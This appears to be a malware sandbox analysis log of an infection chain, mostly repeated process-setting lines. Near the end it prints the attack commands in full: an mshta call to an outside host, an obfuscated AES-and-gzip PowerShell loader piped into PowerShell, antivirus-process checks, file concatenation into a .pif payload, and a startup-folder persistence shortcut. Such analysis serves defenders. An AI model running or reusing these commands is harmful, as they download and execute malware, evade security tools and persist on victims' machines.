              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhostJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848870F6D sldt word ptr [eax]8_2_00007FF848870F6D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2002Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1000Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6529Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2480Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6639Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1776Jump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ProducingJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3784Thread sleep count: 2002 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3784Thread sleep count: 1000 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1264Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 7324Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7480Thread sleep time: -16602069666338586s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7540Thread sleep count: 6639 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7544Thread sleep count: 1776 > 30Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7572Thread sleep time: -10145709240540247s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D65080 FindFirstFileW,FindClose,SetFileAttributesW,DeleteFileW,12_2_00D65080
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D63C80 FindFirstFileW,FindClose,SetLastError,CompareFileTime,12_2_00D63C80
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D64ED0 _DebugHeapAllocator,FindFirstFileW,_DebugHeapAllocator,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetCurrentDirectoryW,SetFileAttributesW,RemoveDirectoryW,12_2_00D64ED0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: mshta.exe, 00000004.00000003.2026299956.00000278B746A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: Identification.pif, 00000019.00000003.2990182254.0000000001E20000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
              Source: mshta.exe, 00000004.00000003.2026672661.00000270B5122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2037570501.00000270B5122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2033570045.00000270B5122000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2011262421.00000270B5122000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: mshta.exe, 00000004.00000003.2026299956.00000278B746A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: powershell.exe, 00000008.00000002.2244988857.0000023DA3119000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllon oS
              Source: Identification.pif, 00000019.00000003.2990182254.0000000001E20000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
              Source: mshta.exe, 00000004.00000003.2011262421.00000270B508C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2036398800.00000270B5090000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2037347752.00000270B5093000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW H
              Source: mshta.exe, 00000004.00000003.2011262421.00000270B50C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2036398800.00000270B50C5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.2037347752.00000270B50C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D69F30 LoadLibraryA,GetProcAddress,GetWindow,GetWindow,12_2_00D69F30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D87CD5 SetUnhandledExceptionFilter,12_2_00D87CD5
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D87F44 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00D87F44
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 12_2_00D61E40 memset,_DebugHeapAllocator,ShellExecuteExW,WaitForSingleObject,CloseHandle,12_2_00D61E40
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" http://whitemansearch.shop/setupJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/2ZrVm4Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\ClassroomEc.exe "C:\Users\user\AppData\Roaming\ClassroomEc.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exitJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 29026Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Producing + Imaging + Phd + Ada + Organ 29026\Identification.pifJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Conf 29026\m Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pif 29026\Identification.pif 29026\m Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhostJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $giwxcqo = 'aaaaaaaaaaaaaaaaaaaaah+ni+e0b2ks3mmnd0sjpk+fk7mupfilz9vvektme+yyv7vbgriarnlhwocdd3xnpyazs1tppp56hnlmknzg3rqllzowww3pr9gtvi4pqrfz4ymgg1kimek8k6tsh0fmp/6pzslccm7m343xsrtqho71kivioxddv9rxueizsvv/r8wv5pa7k2heaf/g1dnaet06jn6lwy+3xxybiz8z2sgfrwiakmlk9dab/leruy0oedx+hdr0opeuvodl8s3tyxpu555rlx05ctd0togq2y+lnpx6fd4bm0mfpap0pqtz0trl0pba/499qw6oyztygixjq47fiytqqcaizp9wkwplfvpxmsua7noylmdcjhqwuyn6keasq952ex0uepaiptsxaqoa6loyomefpb1evpj3uzmpl9bhjdqjhn1/olox0/aplc7vbmqv7fidtyco5ezzrtdcgspb4g8s6vz9sjg0qng+jhmufydvdumhxrj23a1qyqubslmhjdw4snduud7htfvqeags/sl3nlutqkpifmztty2alus2sdq4ofb+z/wvupl80+6+lh5xqnj8m1zd2oz2juag9qcds6ed1lwbdfwkgk1cexwfukroqw+5t52gj98o+jln7pagkzcbb87qc9dofnvz0xr6nvkj3ydwbpve9gy2ursq2smekc28xeg/ogbv4h/40vymmq48szmio+dl98hetduyjda10+uktzg0zrz9tre7n2dualc7akhfke8xxtlsjebjab+74tbyhg6tbn3q8jestwfhavcg/74qyryhv51rgapus4yimlfgdci+kn5tho8qhfy2apvsjgwwvc4nanwywkeodgvs3cud2h7z0etr930+qcff';$pavnvyn = 'ew1fbe1lt2rgdgv3txdrulpywffrbnzgefdtd1r3z2w=';$hgjhdnd = new-object 'system.security.cryptography.aesmanaged';$hgjhdnd.mode = [system.security.cryptography.ciphermode]::ecb;$hgjhdnd.padding = [system.security.cryptography.paddingmode]::zeros;$hgjhdnd.blocksize = 128;$hgjhdnd.keysize = 256;$hgjhdnd.key = [system.convert]::frombase64string($pavnvyn);$fmshi = [system.convert]::frombase64string($giwxcqo);$hwklsipl = $fmshi[0..15];$hgjhdnd.iv = $hwklsipl;$bkvkozaiu = $hgjhdnd.createdecryptor();$wonqxsfki = $bkvkozaiu.transformfinalblock($fmshi, 16, $fmshi.length - 16);$hgjhdnd.dispose();$lmmkhz = new-object system.io.memorystream( , $wonqxsfki );$dylrlk = new-object system.io.memorystream;$cyowfotfz = new-object system.io.compression.gzipstream $lmmkhz, ([io.compression.compressionmode]::decompress);$cyowfotfz.copyto( $dylrlk );$cyowfotfz.close();$lmmkhz.close();[byte[]] $ohxploz = $dylrlk.toarray();$mkeeaj = [system.text.encoding]::utf8.getstring($ohxploz);$mkeeaj | powershell -
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\29026\Identification.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\neuralink.url" & echo url="c:\users\user\appdata\local\neuraconnect technologies\neuralink.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\neuralink.url" & exit
